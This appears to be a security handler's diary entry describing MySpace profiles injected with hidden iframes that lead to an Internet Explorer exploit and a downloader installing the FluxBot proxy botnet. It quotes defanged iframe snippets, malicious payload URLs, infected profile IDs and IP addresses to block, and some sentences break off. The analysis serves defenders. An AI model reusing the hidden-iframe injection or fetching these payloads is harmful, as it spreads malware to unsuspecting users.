CAREFUL! This diary contains links to malicious code!
A number of MySpace profiles include drive by exploits. The exploits will install a version of "flux bot", a very popular proxy network bot.
FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.
Infected MySpace "Friend IDs": 39184135, 171598920, 22057010
A typical excerpt from an infected profile (obfuscated to protect the innocent):
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
<iframe src="http://fafb4c4c .com/header_03.gif" width=1
The domain used here is of course again served via flux. header_03.gif
<iframe src="http://fafb4c4c .com/routine.php" width=1
Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:
http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen among others these
Settings for the bot can be found here:
once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.
Couple IPs that may be worthwhile to block:
AS13767 | 188.8.131.52
AS15083 | 184.108.40.206
AS25761 | 220.127.116.11
AS25761 | 18.104.22.168
As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.
I will be teaching next: Intrusion Detection In-Depth - SANS London May 2021